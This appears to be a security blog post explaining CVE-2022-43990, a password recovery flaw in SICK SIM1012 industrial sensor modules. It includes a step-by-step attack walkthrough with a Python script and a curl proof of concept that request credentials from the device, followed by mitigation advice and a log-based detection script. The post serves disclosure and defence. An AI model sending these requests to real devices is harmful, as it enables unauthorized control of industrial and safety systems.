When we talk about critical infrastructure, industrial automation devices are the invisible workhorses running factories, warehouses, and more. But they can also be ripe targets for cyberattacks—especially if the software running on them is out of date or includes an overlooked vulnerability.

One such vulnerability is CVE-2022-43990, which affects the SICK SIM1012, a prominent sensor integration module used in many automated systems. If the device runs firmware version lower than 2.2., it exposes a dangerous flaw in its password recovery function. This flaw can let a remote, unprivileged attacker escalate their access and potentially take control, disrupting safety and operations.

In this post, I’ll break down what this issue is, show you how it works (including code and real-life steps), point you to official sources, and give you practical security advice.

Vulnerability Type: Weak Password Recovery Mechanism

- Potential Threat: Unprivileged remote attackers can exploit the password recovery feature to gain access to the userlevel specified as RecoverableUserLevel. This boosts their privileges—compromising confidentiality, integrity, and availability.

Official Disclosure

- MITRE CVE Entry
- SICK Security Advisory

How the Exploit Works in Simple Language

The SICK SIM1012 includes a password recovery function for when users lose or forget login details. However, in firmware before 2.2., this mechanism lacks proper authentication and rate-limiting.

That means anyone who can contact the device’s HTTP or web interface can trigger the password recovery workflow and get credentials or session tokens for a higher-privileged account—even if they aren’t authorized.

This bug is repeatable, fast, and does not require special tools.

Step-By-Step Exploit Process

Let’s walk through how an attacker might abuse CVE-2022-43990.

1. Locate a SIM1012 device

The attacker uses standard network scanning (nmap, masscan, etc.) to find devices exposing TCP/HTTP ports.

2. Find the password recovery endpoint

Most SICK devices use a REST-style API or web form for password resets, commonly found at URLs like

http://<device-ip>/password_recovery

By default, the password recovery function is intended for authorized users, but this vulnerability allows anyone to call it.

3. Trigger the recovery workflow

Here’s a Python snippet simulating a password recovery request:

```python
import requests

device_ip = '192.168.1.100'  # replace with target IP
url = f'http://{device_ip}/password_recovery'

# Some devices may require a username or userlevel as a param
params = {
    'userlevel': 'RecoverableUserLevel'
}

# Typically, no auth required for old firmware; the timeout just keeps
# the script from hanging on an unresponsive device
response = requests.post(url, data=params, timeout=10)

if response.status_code == 200:
    print('[*] Password recovery successful')
    print('[*] Response from device:', response.text)
else:
    print('[!] Failed to recover password:', response.status_code)
```

4. Gain Elevated Access

The device responds by providing either a temporary password, session token, or a reset link for an account with the privileges of RecoverableUserLevel (often an operator or admin).

5. Log In and Escalate

The attacker logs in with the recovered credentials and controls device settings, including:

- Network configuration
- Integration with safety systems
- Firmware flashing
- Triggering or suppressing safety events

Because the flaw is trivial to exploit and doesn’t require insider access, repeatable attacks are possible.

A minimal PoC, for educational and authorized use only:

```shell
curl -X POST "http://<device-ip>/password_recovery" -d "userlevel=RecoverableUserLevel"
```

Check your device’s response. If you receive an access token, password, reset link, or confirmation, the device is vulnerable.

How to Fix (Mitigation)

Update firmware to version 2.2. or later immediately. You can get the new firmware and instructions from SICK’s official support portal.

Until patched, restrict access to the device’s network (e.g., using firewalls or VPNs).
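While a device is still unpatched, it helps to watch for the two conditions this flaw permits: successful recovery requests with no authenticated user, and bursts of recovery requests from one source that a rate limit would have blocked. The script below is an added example written for this post, not code from SICK or from the original write-up; it assumes the device or a reverse proxy in front of it writes Common Log Format access logs (adapt the regex to your actual source), and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Common Log Format as written by many reverse proxies. The SIM1012 itself
# may log differently, so adjust this regex to your log source (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

RECOVERY_PATH = "/password_recovery"   # endpoint named in the write-up above

# Constructed sample log lines (not real device output).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2022:21:15:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [01/Nov/2022:21:15:03 +0000] "POST /password_recovery HTTP/1.1" 200 87
10.0.0.9 - - [01/Nov/2022:21:15:04 +0000] "POST /password_recovery HTTP/1.1" 200 87
10.0.0.9 - - [01/Nov/2022:21:15:04 +0000] "POST /password_recovery HTTP/1.1" 200 87
10.0.0.7 - operator [01/Nov/2022:21:16:10 +0000] "POST /password_recovery HTTP/1.1" 200 87
10.0.0.9 - - [01/Nov/2022:21:17:00 +0000] "GET /login HTTP/1.1" 200 301
"""

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_recovery_abuse(log_text, burst_threshold=3):
    # unauth_hits: successful recovery requests with no authenticated user ("-"),
    #              i.e. exactly what the missing authentication check allows.
    # bursty: source IPs with >= burst_threshold recovery requests, which the
    #         missing rate limit would otherwise let through unnoticed.
    per_ip = defaultdict(int)
    unauth_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["path"].split("?")[0] != RECOVERY_PATH:
            continue
        per_ip[rec["ip"]] += 1
        if rec["user"] == "-" and rec["status"] == "200":
            unauth_hits.append((rec["ip"], rec["ts"]))
    bursty = sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)
    return unauth_hits, bursty

if __name__ == "__main__":
    hits, bursty = find_recovery_abuse(SAMPLE_LOG)
    for ip, ts in hits:
        print(f"[!] unauthenticated recovery success from {ip} at {ts}")
    print("[!] burst sources:", bursty)
```

On the constructed sample, the three anonymous requests from 10.0.0.9 are flagged and that address is reported as a burst source, while the authenticated request from the operator account is not.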

References

- NVD – CVE-2022-43990
- SICK Product Security
- SICK SIM1012 Operator’s Manual (PDF)

Takeaway

Industrial automation devices must be patched regularly. Unprotected password recovery endpoints can be catastrophic – as with CVE-2022-43990, exploitation is simple and attacks are repeatable. Audit your networks and devices, disable unnecessary access, and update firmware to keep your systems safe.

If you own or operate a SICK SIM1012 on firmware lower than 2.2., review your security immediately!

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:12:00 UTC